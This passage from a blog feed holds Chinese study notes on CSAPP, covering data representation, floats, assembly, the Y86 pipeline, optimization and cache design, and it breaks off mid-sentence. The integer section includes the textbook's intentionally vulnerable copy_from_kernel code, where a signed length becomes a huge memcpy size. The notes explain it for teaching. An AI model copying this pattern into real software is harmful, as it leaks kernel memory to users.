    <category term="uCore" scheme="https://kiprey.github.io/tags/uCore/"/>
    
    <category term="OS" scheme="https://kiprey.github.io/tags/OS/"/>
    
  </entry>
  
  <entry>
    <title>CSAPP Notes</title>
    <link href="https://kiprey.github.io/2020/07/csapp/"/>
    <id>https://kiprey.github.io/2020/07/csapp/</id>
    <published>2020-07-26T03:12:44.000Z</published>
    <updated>2025-11-24T03:59:39.945Z</updated>
    
    <content type="html"><![CDATA[<h2 id="简介">简介</h2><ul><li>这里存放着一点笔者阅读CSAPP所记录的笔记</li><li>由于CSAPP内容众多，这里只记录了一些笔者学习的主要点</li><li>根据笔者的进度，持续更新。单次更新随缘记录。</li></ul><span id="more"></span><h2 id="一、-计算机系统漫游">一、 计算机系统漫游</h2><ul><li>在计算机世界中，<strong>信息</strong> 就是位(bit) + 上下文。在不同的上下文中，其数据也会表示出不同的意思。<br>例如：<ul><li>在一串数字中，0x90表示154</li><li>在一串机器码中，0x90表示nop指令</li><li>在 一串字符串中，0x90表示一个特殊的字符</li></ul></li><li>代码语言可以被其他程序翻译为不同的格式。以C语言为例，其中可以分为如下几个阶段<ul><li><strong>预处理阶段</strong>。 预处理器(cpp)根据<code>#</code>开头的预处理命令，插入或隐藏部分代码。修改后的源代码以<code>.i</code>为后缀</li><li><strong>编译阶段</strong>。编译器(ccl)将<code>.i</code>文件编译为汇编代码<code>.s</code>文件</li><li><strong>汇编阶段</strong>。汇编器(as)读取<code>.s</code>文件并将其转换为机器语言指令，打包生成一种<em>可重定位目标指令</em>的格式，并将其保存在<code>.o</code>文件中。</li><li><strong>链接阶段</strong>。有些<code>.o</code>文件调用了某个库函数，但这个库函数的实现在另一个<code>.o</code>文件中。因此链接器(ld)需要将各种<code>.o</code>文件链接，最终生成可执行文件。</li></ul></li><li>系统的硬件由以下几个部件组成<ul><li>总线</li><li>I/O设备</li><li>主存</li><li>处理器(CPU)<ul><li>处理器执行的操作会围绕寄存器文件(register file)和算术/逻辑单元(ALU)进行。</li><li>处理器在指令的要求下可能会执行<em>加载、存储、操作、跳转</em>等操作</li></ul></li></ul></li><li>处理器的运行速度很快，但数据从主存运送到CPU里却相当的慢。这其中速度可能相差百倍以上，大大拖累了CPU的速度。<br>针对这种处理器与主存之间的差异，系统设计者引入了更小更快的存储设备——<em>高速缓存存储器</em>(cache)，这其中利用了高速缓存的<em>局部性原理</em>。</li><li>操作系统管理硬件<ul><li>我们可以将做操系统看成是应用程序和硬件之间插入的一层软件，所有应用程序对硬件的操作尝试都必须通过操作系统。</li><li>操作系统的基本功能<ul><li>防止硬件被失控的应用程序滥用。</li><li>向应用程序提供简单一致的机制来控制复杂而又通常大不相同的低级硬件设备。</li></ul></li><li>文件是对I/O设备的抽象表示，虚拟内存是对主存和磁盘I/O设备的抽象表示。进程则是对处理器、主存和I/O设备的抽象表示。</li><li><strong>进程</strong><ul><li>进程是操作系统对一个正在运行的程序的一种抽象。而<em>并发运行</em>，则是一个进程的指令和另一个进程的指令交错进行。</li><li>操作系统实现这种进程交错指令的机制称为<em>上下文切换</em>。<em>上下文</em>是操作系统保持跟踪进程运行所需的所有状态信息。</li></ul></li><li><strong>线程</strong><ul><li>一个进程实际上可以由多个称为<em>线程</em>的执行单位组成</li><li>每个线程都运行在进程的上下文中，并共享同样代码和全局数据。</li><li>多线程之间比多进程之间更容易共享数据。线程一般来说也比进程更高效。</li></ul></li><li><strong>虚拟内存</strong><ul><li>虚拟内存为每个进程提供了一个假象——即每个继承都在独占地使用主存。每个进程看到的内存都是一致的，称为<em>虚拟地址空间</em>。</li><li>虚拟内存的布局从低地址到高地址，分别为<ul><li>程序代码和数据。其中的数据包括全局变量与只读变量（例如字符串）</
li><li>堆内存。当调用内存分配或释放函数时，堆可以在运行时动态地扩展和收缩。</li><li>共享库。地址中间部分是一块用来存放像C标准库和数学库这样的共享库代码和数据的区域。</li><li>栈内存。位于用户虚拟地址空间顶部的是用户栈，编译器用它来实现函数调用。</li><li>内核虚拟内存。地址空间最顶部的区域是为内核保留的。不允许应用程序读/写/执行这个区域的内容。应用程序只能调用内核来执行这些操作。<br><img src="/2020/07/csapp/chapters1_vm.png" alt="img"></li></ul></li></ul></li></ul></li></ul><h2 id="二、-信息的表示和处理">二、 信息的表示和处理</h2><h3 id="1-字节顺序">1) 字节顺序</h3><ul><li>字节顺序分为<em>大端序</em>(big-endian)和<em>小端序</em>(little-endian)。大多数机器使用的都是小端序。<br><img src="/2020/07/csapp/chapters2_endian.png" alt="img"></li></ul><h3 id="2-补码-two’s-complement">2) 补码(two’s complement)</h3><ul><li><p>为了在正数的基础上实现负数的表达，将数据的最高位设置为符号位。当符号位为0时，当前数据表示为非负数；当符号位为1时，当前数据表示为负数。</p></li><li><p>故以32位int类型为例，其正数范围为<code>0x00000001 ~ 0x7fffffff</code>；负数范围为<code>0x80000000~0xffffffff</code>。取值范围为<code>-2147483648~2147483647</code>。</p></li><li><p>取值范围不是对称的，负数的范围比正数的范围大一。故在int类型中，不是所有的负数都存在其相反数。例如以下例子</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(-INT_MIN == INT_MIN)</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;This message will always be printed.&quot;</span>);</span><br></pre></td></tr></table></figure></li><li><p><code>INT_MIN == -2147483648</code>，故<code>-INT_MIN</code>在数学上等于<code>2147483648</code>，即<code>INT_MAX + 1</code>，超过了int的最大值，造成上溢。在常见的补码实现上，溢出后的位模式仍是<code>INT_MIN</code>，即<code>-INT_MIN == INT_MIN</code>。（严格来说，有符号整数溢出在C标准中属于未定义行为，这里描述的是常见实现上的结果。）</p></li></ul><h3 id="3-有符号整数和无符号整数">3) 有符号整数和无符号整数</h3><ul><li><p>通过强制类型转换来转换无符号/有符号类型，其数据的<strong>位值不变</strong>，但改变了<strong>解释这些位的方式</strong>。</p></li><li><p>需要注意的是，尽量避免无符号/有符号类型的混用，因为这样可能会进行隐式类型转换，造成非预期的错误。例如以下漏洞代码</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span 
class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="keyword">define</span> KSIZE 1024</span></span><br><span class="line"><span class="type">char</span> kbuf[KSIZE];</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">void</span> *<span class="title">memcpy</span><span class="params">(<span class="type">void</span> *dest, <span class="type">void</span>*src, <span class="type">size_t</span> n)</span></span>;</span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">copy_from_kernel</span><span class="params">(<span class="type">void</span>* user_dest, <span class="type">int</span> maxlen)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="type">int</span> len = KSIZE &lt; maxlen ? 
KSIZE : maxlen;</span><br><span class="line">  <span class="built_in">memcpy</span>(user_dest, kbuf, len);</span><br><span class="line">  <span class="keyword">return</span> len;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>当程序调用<code>copy_from_kernel</code>函数所传入的<code>maxlen</code>参数为负数时，<code>len</code>也是负数；传给<code>memcpy</code>时由于隐式类型转换，参数<code>n</code>会变成一个非常大的无符号整数，这将使程序读取到它未被授权访问的内核内存区域。</p></li></ul><h3 id="4-IEEE浮点表示">4) IEEE浮点表示</h3><ul><li><p>二进制小数表示的例子: $0.0011_2 = 0.1875_{10}$</p><ul><li>$0.0011_2 = 0\times0.1_2 + 0\times0.01_2 + 1\times0.001_2 + 1\times0.0001_2$</li><li>$0.1875_{10} = 0\times0.5_{10} + 0\times0.25_{10} + 1\times0.125_{10} + 1\times0.0625_{10}$</li><li>上面两式逐项对应：二进制小数点后第$k$位的权重为$2^{-k}$</li></ul></li><li><p>IEEE浮点标准用$V=(-1)^s\times M\times2^E$的形式来表示一个浮点数：</p><ul><li>符号(sign)，$s$决定这个数是正数还是负数。</li><li>尾数(significand)，$M$是一个二进制小数。</li><li>阶码(exponent)， $E$的作用就是为浮点数加权，这个权重是$2^E$（阶码可为负）</li></ul></li><li><p>浮点数的位级表示方式</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">float</span>:</span><br><span class="line">位序号：   <span class="number">31</span> | <span class="number">30</span>           <span class="number">23</span> | <span class="number">22</span>                           <span class="number">0</span> |</span><br><span class="line">        +-------------------------------------------------------+</span><br><span class="line">位表示： |  s |     exp         |       frac                     |</span><br><span class="line">        +-------------------------------------------------------+</span><br><span 
class="line"></span><br><span class="line"><span class="type">double</span>:</span><br><span class="line">位序号：   <span class="number">63</span> | <span class="number">62</span>    <span class="number">52</span> | <span class="number">51</span>                                  <span class="number">0</span> |</span><br><span class="line">        +-------------------------------------------------------+</span><br><span class="line">位表示： |  s |     exp  |                frac                   |</span><br><span class="line">        +-------------------------------------------------------+</span><br></pre></td></tr></table></figure></li><li><p>浮点数的权重并非直接取$2^{exp}$，阶码字段exp需要先减去一个偏移。该偏移为$offset = 2^{n-1} - 1$，其中n为阶码位数（float为8位，double为11位）。</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// float类型</span></span><br><span class="line"><span class="type">int</span> offset = <span class="built_in">pow</span>(<span class="number">2</span>, <span class="number">7</span>) - <span class="number">1</span>;</span><br><span class="line"><span class="type">int</span> trueExp = exp - offset;</span><br></pre></td></tr></table></figure><p>规格化数真正的权重为$2^{exp-offset}$</p></li><li><p>浮点数编码的值有4种不同的情况（以下以float为例，其阶码字段全1时为255）</p><ul><li><strong>规格化</strong> 的。exp != 0 &amp;&amp; exp != 255</li><li><strong>非规格化</strong> 的。exp == 0</li><li>特殊情况<ol><li><strong>无穷大</strong> 。exp == 255 &amp;&amp; frac == 0</li><li><strong>NaN</strong> 。exp == 255 &amp;&amp; frac != 0<br><img src="/2020/07/csapp/chapters2_ieee_float_example.png" alt="img"></li></ol></li></ul></li><li><p>尽管浮点数可表达的范围较大，但浮点数的绝对值越大，相邻两个可表示的数之间的间隔就越大，精度越低；绝对值越小，间隔越小，精度越高。不管精度如何变化，能精确表示的数始终是有限的。</p><blockquote><p>浮点数无法精确表示所有的小数。大多数小数都只能近似表示，例如0.1用float表示时约为0.100000001。<br>浮点数也无法精确表示超大整数。超大整数的表示可能会丢失一些精度，例如表示的整数与预期值相差1等等。<br><img src="/2020/07/csapp/chapters2_ieee_range.png" 
alt="img"></p></blockquote></li><li><p>float类型最好不要与double类型的数据进行比较，否则会产生一些奇怪的错误，例如以下代码</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">float</span> a = <span class="number">0.1</span>;</span><br><span class="line"><span class="type">double</span> b = <span class="number">0.1</span>;</span><br><span class="line"><span class="keyword">if</span> (a == b)</span><br><span class="line">  cout &lt;&lt; <span class="string">&quot;1&quot;</span>;</span><br><span class="line"><span class="keyword">if</span> (a == (<span class="type">float</span>)b)</span><br><span class="line">  cout &lt;&lt; <span class="string">&quot;2&quot;</span>;</span><br><span class="line"><span class="keyword">if</span> ((<span class="type">double</span>)a == b)</span><br><span class="line">  cout &lt;&lt; <span class="string">&quot;3&quot;</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 只输出 2</span></span><br></pre></td></tr></table></figure><p>当两个浮点数进行比较时，程序会自动将某个浮点数的类型转换成与另一个浮点数相同的类型，并比较其位级表示。 这段代码已经可以验证浮点数的不精确性。</p></li></ul><h2 id="三、-程序的机器级表示">三、 程序的机器级表示</h2><blockquote><p>常用的汇编指令暂且不表，这里只记录一些特殊的指令</p></blockquote><h3 id="1-用条件传送来实现条件分支">1) 用条件传送来实现条件分支</h3><ul><li><p>实现条件操作的传统方法是通过使用<em>控制</em>的条件转移，例如各类跳转指令。这种机制十分简单而通用。但在现代处理器上，它可能会非常低效。</p><blockquote><p>原因是现代处理器使用流水线方式来执行指令。<br>遇到条件跳转指令时，CPU会预判一条执行路径并将该路径上的指令装载进CPU里。<br>倘如预判失败，则必须清空流水线上的错误指令，而该操作会消耗大量时间，代价十分高昂。</p></blockquote></li><li><p>一种替代策略是使用数据的条件转移。这种方法计算一个条件操作的两种结果，然后根据条件是否满足从中选取一个。如果这种策略在某些情况下可行，则只需用一条简单的条件传送指令来实现。例如以下代码：</p><figure class="highlight cpp"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 原始C代码</span></span><br><span class="line"><span class="keyword">if</span>(a &gt; b)</span><br><span class="line">  a = b;</span><br><span class="line"></span><br><span class="line"><span class="comment">// 条件转移实现条件分支</span></span><br><span class="line"><span class="comment">// %rdi: a, %rsi: b（AT&amp;T语法，cmp %rsi, %rdi 根据 a - b 设置条件码）</span></span><br><span class="line">  cmp %rsi, %rdi</span><br><span class="line">  jle nextInst</span><br><span class="line">  mov %rsi, %rdi</span><br><span class="line">nextInst:</span><br><span class="line">  ...</span><br><span class="line"></span><br><span class="line"><span class="comment">// 条件传送实现条件分支</span></span><br><span class="line"><span class="comment">// %rdi: a, %rsi: b</span></span><br><span class="line">  cmp %rsi, %rdi</span><br><span class="line">  <span class="comment">// 当 %rdi &gt; %rsi时，将%rsi中的数据拷贝至%rdi中</span></span><br><span class="line">  cmovg %rsi, %rdi</span><br><span class="line">  ...</span><br></pre></td></tr></table></figure></li></ul><h3 id="2-浮点代码">2) 浮点代码</h3><ul><li>浮点数所使用的寄存器与整型所使用的<code>%rdi,%rsi...</code>不同，它们分别是<code>%ymm0~%ymm15</code>，每个<code>%ymmX</code>寄存器可以保存32字节。其中<code>%xmmX</code>寄存器是<code>%ymmX</code>寄存器的低16<strong>字节</strong>。</li></ul><blockquote><p>由于浮点数指令使用频率较低，暂且不表</p></blockquote><h2 id="四、-处理器体系结构">四、 
处理器体系结构</h2><blockquote><p>该章节中，作者定义了一个简单的<code>Y86</code>指令集用于学习，以下笔记均以<code>Y86</code>指令集为基础进行记录。<br>需要注意的是，尽管书上使用<code>Y86</code>指令集进行讲解，我们仍可通过该指令集来探究现代指令集。</p></blockquote><ul><li>一个处理器支持的指令和指令的字节级编码，称为<em>指令集体系结构</em>(Instruction-Set Architecture, ISA)。</li></ul><h3 id="1-程序员可见状态">1) 程序员可见状态</h3><ul><li>程序中的每条指令都会读取或修改处理器状态的某些部分，这称为<em>程序员可见状态</em><blockquote><p>这里的<em>程序员</em>，既可以是用汇编代码写程序的人，也可以是产生机器级代码的编译器。</p></blockquote></li><li><em>可见状态</em>包括：<ul><li>RF: 程序寄存器</li><li>CC: 条件码</li><li>Stat: 程序状态。状态码指明程序是否运行正常或发生某个特殊事件。</li><li>DMEM: 内存</li><li>PC: 程序计数器</li></ul></li></ul><h3 id="2-指令编码">2) 指令编码</h3><ul><li><p>每条指令需要1~10个字节不等。</p></li><li><p>每条指令的第一个字节表明指令的类型。其中高4位是<em>代码</em>(code)部分，低4位是<em>功能</em>(function)部分。</p><blockquote><p>功能值只有在一组相关指令共用一个代码时才有用。</p></blockquote><p>以下是部分指令的具体字节编码</p><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">注：方括号中的数据，是指令第一个字节的十六进制表示</span><br><span class="line"></span><br><span class="line">整数操作指令    分支指令                    传送指令</span><br><span class="line">addq [60]     jmp [70]  jne [74]    rrmovq [20] cmovne [24]</span><br><span class="line">subq [61]     jle [71]  jge [75]    cmovle [21] cmovge [25]</span><br><span class="line">andq [62]     jl  [72]  jg  [76]    cmovl  [22] cmovg  [26]</span><br><span class="line">xorq [63]     je  [73]              cmove  [23]</span><br></pre></td></tr></table></figure><p>以上面的编码为例，<code>rrmovq</code>指令与条件传送有同样的指令代码，可以把它看作是一个“无条件传送”。</p></li><li><p>指令的长度与指令功能相关，有些需要操作数的指令编码就更长一点。</p><ul><li>可能有附加的<em>寄存器指示符字节</em>(register specifier byte)，用于指定1~2个寄存器。</li><li>有些指令需要一个附加的<em>常数字</em>(constant word)。这个常数会成为指令的某个操作数（例如立即数）。<blockquote><p>例如<code>irmovq $1, %rax</code>。<br><img 
src="/2020/07/csapp/chapters4_y86_isa.png" alt="img"></p></blockquote></li></ul></li></ul><h3 id="3-异常">3) 异常</h3><ul><li>在现代处理器中，当某些代码发生了某种类型的<strong>异常</strong>(exception)，此时处理器会执行异常处理程序。如果程序员没有手动设置异常处理程序，则CPU会执行默认的处理程序。<blockquote><p>大多数情况下默认的处理程序只会简单地终止程序。</p></blockquote></li></ul><h3 id="4-SEQ阶段">4) SEQ阶段</h3><p><img src="/2020/07/csapp/chapters4_y86_graph.png" alt="img"></p><blockquote><p>详细细节请翻阅CSAPP第三版第277页，这里只是简单概述</p></blockquote><ul><li>取指阶段<ul><li>以PC作为第一个字节的地址，指令内存硬件单元会一次从内存中读出10个字节。并将第一个字节分割成两个4位的数，用于计算指令代码和功能码。</li><li>PC增加硬件单元会根据当前PC以及CPU内的信号来生成下一条指令的PC。<br>$new PC = old PC + 1 + r + 8i$（$r$表示当前指令是否需要寄存器指示符字节，$i$表示当前指令是否需要常数字，取值均为0或1）<blockquote><p>注意，此时只是计算，还没有设置下一条的PC<br><img src="/2020/07/csapp/chapters4_y86_fetch.png" alt="img"></p></blockquote></li></ul></li><li>译码和写回阶段<ul><li>寄存器文件有两个读端口A和B，从这两个端口同时读取寄存器值valA和valB<br><img src="/2020/07/csapp/chapters4_y86_translate.png" alt="img"></li></ul></li><li>执行阶段<ul><li>执行阶段包括ALU，该单元根据<code>alufun</code>信号的设置，对输入的<code>aluA</code>、<code>aluB</code>执行特定操作。</li><li>执行阶段还包括条件码寄存器。每次运行时，ALU都会产生三个与条件码相关的信号——零、符号、溢出。</li><li>标号为<code>cond</code>的硬件单元会根据条件码和功能码来确定是否进行条件分支或条件数据传送。<br><img src="/2020/07/csapp/chapters4_y86_exec.png" alt="img"></li></ul></li><li>访存阶段<ul><li>该阶段的任务为读写程序数据，即对数据内存进行读或写（寄存器文件的写入在写回阶段完成）<br><img src="/2020/07/csapp/chapters4_y86_visitM.png" alt="img"></li></ul></li><li>更新PC阶段<ul><li>根据指令的类型以及是否选择分支来设置新的PC。如果没有跳转，则使用取指阶段计算出的新PC值。<br><img src="/2020/07/csapp/chapters4_y86_updatePC.png" alt="img"></li></ul></li></ul><h3 id="5-流水线">5) 流水线</h3><h4 id="a-流水线冒险">a. 
流水线冒险</h4><ul><li><p>将流水线技术引入一个带反馈的系统，当相邻指令间存在相关时会导致问题。</p><blockquote><p>这里的<em>相关</em>有两种形式：<br>1.数据相关。下一条指令会用到当前指令计算出的结果。<br>2.控制相关。一条指令要确定下一条指令的位置。</p></blockquote><p>这些相关可能会导致流水线产生计算错误，称为冒险(hazard)。其中也分为<em>数据冒险</em>和<em>控制冒险</em>。</p></li><li><p>避免冒险的方式</p><ul><li>暂停(stalling)。暂停技术将一组指令阻塞在它们所处的阶段，而允许其他指令继续通过流水线，直到冒险条件不再满足。其处理方法为：每次要把一条指令阻塞在译码阶段，就在执行阶段插入一个气泡（bubble）。气泡类似nop指令，不会更改寄存器、内存、条件码与程序状态。<br><img src="/2020/07/csapp/chapters4_pipelin_bubble.png" alt="img"></li><li>转发(forwarding)。将结果值直接从一个流水线阶段传到较早阶段的技术称为数据转发，也称旁路(bypassing)。<br><img src="/2020/07/csapp/chapters4_pipelin_forward.png" alt="img"></li></ul></li><li><p>为了提高CPU的运行速度，应尽量避免流水线冒险</p></li></ul><h2 id="五、-优化程序性能">五、 优化程序性能</h2><h3 id="1-代码移动">1) 代码移动</h3><p>将循环不变量从循环中提出。例如以下操作</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 优化前</span></span><br><span class="line"><span class="keyword">for</span>(<span class="type">size_t</span> i = <span class="number">0</span>; i &lt; <span class="built_in">strlen</span>(str); i++)</span><br><span class="line">  Statements;</span><br><span class="line"><span class="comment">// 优化后</span></span><br><span class="line"><span class="type">size_t</span> str_len = <span class="built_in">strlen</span>(str);</span><br><span class="line"><span class="keyword">for</span>(<span class="type">size_t</span> i = <span class="number">0</span>; i &lt; str_len; i++)</span><br><span class="line">  Statements;</span><br></pre></td></tr></table></figure><p>上面的例子中，如果编译器无法把<code>strlen</code>调用移出循环，未优化版本每次判断循环条件都要重新遍历整个字符串，时间复杂度可达到$O(N^2)$级别！改进后的时间复杂度只有$O(N)$。</p><h3 id="2-消除不必要的内存引用">2) 消除不必要的内存引用</h3><p>减少不必要的内存读/写以获得更高的执行速度。</p><h3 id="3-理解现代处理器">3) 
理解现代处理器</h3><p>现代处理器使用流水线机制，同时搭配高速缓存以达到更高的速度。避免流水线暂停或cache中数据未命中，可以让CPU尽可能地发挥出全部性能。</p><h3 id="4-循环展开">4) 循环展开</h3><ul><li><p>循环展开是一种程序变换，通过增加每次迭代计算的元素数量，减少循环的迭代次数。</p></li><li><p>例子：</p>  <figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 循环展开前</span></span><br><span class="line"><span class="keyword">for</span>(<span class="type">int</span> i = <span class="number">0</span>; i &lt; length; i++)</span><br><span class="line">  acc0 = acc0 OP data[i];</span><br><span class="line"></span><br><span class="line"><span class="comment">// 循环展开后（每次迭代处理2个元素）</span></span><br><span class="line"><span class="type">int</span> limits = length - <span class="number">1</span>;</span><br><span class="line"><span class="type">int</span> i;</span><br><span class="line"><span class="keyword">for</span>(i = <span class="number">0</span>; i &lt; limits; i += <span class="number">2</span>)</span><br><span class="line">&#123;</span><br><span class="line">  acc0 = acc0 OP data[i];</span><br><span class="line">  acc0 = acc0 OP data[i<span class="number">+1</span>];</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">for</span>(; i &lt; length; i ++)</span><br><span class="line">  acc0 = acc0 OP data[i];</span><br></pre></td></tr></table></figure></li></ul><h3 id="5-多个累计变量">5) 多个累计变量</h3><ul><li><p>对于一个可结合且可交换的合并运算，我们可以通过将一组合并运算分割成两个或更多的部分，并在最后合并结果来提高性能。</p></li><li><p>例子</p><blockquote><p>该例子还运用了循环展开技术。</p></blockquote><figure class="highlight cpp"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span> limits = length - <span class="number">1</span>;</span><br><span class="line"><span class="type">int</span> i;</span><br><span class="line"><span class="keyword">for</span>(i = <span class="number">0</span>; i &lt; limits; i += <span class="number">2</span>)</span><br><span class="line">&#123;</span><br><span class="line">  acc0 = acc0 OP data[i];</span><br><span class="line">  acc1 = acc1 OP data[i<span class="number">+1</span>];</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">for</span>(; i &lt; length; i ++)</span><br><span class="line">  acc0 = acc0 OP data[i];</span><br><span class="line"><span class="type">int</span> total = acc0 OP acc1;</span><br></pre></td></tr></table></figure></li></ul><h2 id="六、-存储器层次结构">六、 存储器层次结构</h2><h3 id="1-局部性">1) 局部性</h3><ul><li>一个编写良好的计算机程序常常具有良好的<em>局部性</em>(locality)。</li><li>程序倾向于引用邻近于其他最近引用过的数据项的数据项，或者最近引用过的数据项本身。这种倾向性，被称为<em>局部性原理</em>(principle of locality)。</li><li>局部性通常有两种不同的形式，分别为<em>时间局部性</em>和<em>空间局部性</em><ul><li>时间局部性：被引用过一次的内存位置很可能在不远的将来被多次引用。</li><li>空间局部性：如果一个内存位置被引用了一次，那么程序很可能在不远的将来引用附近的一个内存位置。</li></ul></li><li>有良好局部性的程序比局部性差的程序运行得更快。</li></ul><h3 id="2-高速缓存存储器">2) 高速缓存存储器</h3><ul><li>Cache是一种小容量高速缓冲存储器，它由SRAM组成，其直接制作在CPU芯片内，速度几乎与CPU一样快。</li><li>程序运行时，CPU使用的一部分数据/指令会预先成批拷贝在Cache中，当CPU需要从内存读/写数据或指令时，先检查Cache，若有，就直接从Cache中读取，而不用访问主存储器。</li><li>由于程序访问的局部性特征，大多数情况下CPU可以直接从这个高速缓存中取得指令和数据，不必再访问主存。这大大提高了访存速度。</li><li>Cache的通用组织<br><img src="/2020/07/csapp/chapter6_cache.png" alt="img"></li><li>有效位<ul><li>有效位为0时表示信息无效，为1表示信息有效</li><li>开机或复位时，所有高速缓存行的有效位V = 
0</li><li>某行被替换后使其为1</li><li>某行被装入新块后使其为1</li><li>通过使V=0冲刷Cache（例如：进程切换）<blockquote><p>“Cache冲刷”指令为操作系统所使用，对操作系统程序员不是透明的。</p></blockquote></li></ul></li></ul><h4 id="a-直接映射高速缓存">a. 直接映射高速缓存</h4><ul><li>每个组只有一行的高速缓存称为<em>直接映射</em>高速缓存(direct-mapped cache)<br><img src="/2020/07/csapp/chapter6_directMap-cache.png" alt="img"></li><li>高速缓存请求数据的流程<ul><li>组选择：从主存地址中的特定偏移处抽取s个组索引位，这些位被解释成一个对应的无符号整数高速缓存组号。<br><img src="/2020/07/csapp/chapter6_directMap-cache_group.png" alt="img"></li><li>行匹配：直接映射高速缓存中每组只有一个高速缓存行。如果当前行的有效位已经设置，并且标记(tag)匹配，则缓存命中。</li><li>字选择：根据后b位的块内偏移来获取所需的字<br><img src="/2020/07/csapp/chapter6_directMap-cache_line.png" alt="img"></li><li>行替换：如果缓存不命中，则需要从下一级存储层次结构中取出请求的块，并驱逐、替换当前的高速缓存行。</li></ul></li><li>优点：唯一映射；命中时间小</li><li>缺点：缺失率高；关联度低</li></ul><h4 id="b-全相联高速缓存">b. 全相联高速缓存</h4><ul><li><em>全相联高速缓存</em>（fully associative cache）是由一个包含所有高速缓存行的组组成的。</li><li>全相联高速缓存的结构较为简单<br><img src="/2020/07/csapp/chapter6_fullMap-cache.png" alt="img"></li><li>全相联高速缓存中的行匹配和字选择与上述的类似；由于只有一个组，所以默认选择组0。<br><img src="/2020/07/csapp/chapter6_fullMap-cache_found.png" alt="img"></li><li>由于全相联高速缓存电路必须并行搜索许多相匹配的标记，构成一个又大又快的相联高速缓存十分困难，而且造价昂贵。因此全相联高速缓存只适合做小的高速缓存。<blockquote><p>例如虚拟内存系统中的翻译后备缓冲器(TLB)，该部件用于缓存页表项。</p></blockquote></li></ul><h4 id="c-组相联高速缓存">c. 
组相联高速缓存</h4><ul><li><em>组相联高速缓存</em>（set associative cache）是上述两种高速缓存的结合体。下图是它的结构<br><img src="/2020/07/csapp/chapter6_setMapCache.png" alt="img"></li><li>组相联高速缓存的组匹配<br><img src="/2020/07/csapp/chapter6_setMapCache_group.png" alt="img"></li><li>组相联高速缓存的行匹配与字选择<br><img src="/2020/07/csapp/chapter6_setMapCache_line.png" alt="img"></li><li>组相联高速缓存的不命中。<ul><li>当数据不命中时，需要替换该组中的某一行。其常用的替换算法有：<ul><li>随机替换算法（rand）</li><li>先进先出算法（FIFO）</li><li>最近最少用LRU（least-recently used）</li><li>最不经常用LFU（least-frequently used）</li></ul></li><li>以LRU算法为例。LRU是一种栈算法，它的命中率随组的增大而提高。<br>LRU具体实现时，通过给每个cache行设定一个计数器，根据计数值来记录主存块的使用情况。<blockquote><p>这个计数值称为<strong>LRU位</strong><br>当CPU访问了Cache时，相关Cache行的LRU位会被更新。在下一次数据未命中时，高速缓存硬件通过比较特定组内的LRU位，选出最近最少用的Cache行，驱逐并重新加载数据。</p></blockquote></li></ul></li></ul><h4 id="d-写策略">d. 写策略</h4><ul><li>必须保持Cache中的数据和主存中数据一致，否则会出现Cache一致性问题。<blockquote><p>例如当多个设备都允许访问主存，或多个CPU都带有各自的Cache而共享主存时</p></blockquote></li><li>写操作有两种情况<ul><li>写命中（Write Hit）：要写的单元已经在Cache中<ul><li>直写（Write Through）: 同时写Cache和主存单元。（速度十分缓慢）</li><li>回写（Write Back）: 只写Cache不写主存，等到该行被替换时才一次性写回主存。每行需要一个修改位（dirty bit, 